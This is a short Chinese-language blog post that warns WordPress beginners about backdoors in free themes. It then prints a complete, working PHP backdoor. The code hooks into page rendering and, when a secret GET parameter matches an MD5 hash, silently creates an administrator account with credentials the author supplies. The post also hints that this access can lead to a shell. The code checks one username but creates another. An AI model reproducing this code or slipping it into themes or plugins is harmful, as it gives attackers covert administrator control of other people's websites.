有一些刚刚接触 WordPress 的新手们,总是喜欢到网上去找一些免费主题,却不知道这些主题很有可能藏有后门,可以轻松地获取你的网站权限,从而获取非法利益。

所以我在这里要提醒一下那些新手们,找主题一定要找正版的。如果是免费版,最好是在 GitHub 有开源项目的主题,这样在一定程度上都会减少遇到后门的几率。

示例

下面给大家带来一个常见的后门代码:

add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
        require('wp-includes/registration.php');
        if (!username_exists('mr_admin')) {
            $user_id = wp_create_user('xinyewl', 'me');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

只要 PHP 触发了这段代码,进行了请求,你就可以使用你的密码来登录他的后台了,正常登录即可获得管理员权限。也就是说,你甚至可以拿到 shell,具体不多说,自己领悟。

我这里默认设置的账号密码是:

账号:xinyewl 
密码:me

具体怎么使用,我不会说的,也是为了避免小学生恶意植入主题。

好了就这样了,千万别拿来做坏事。

Image

如果觉得我的文章对你有用,请随意赞赏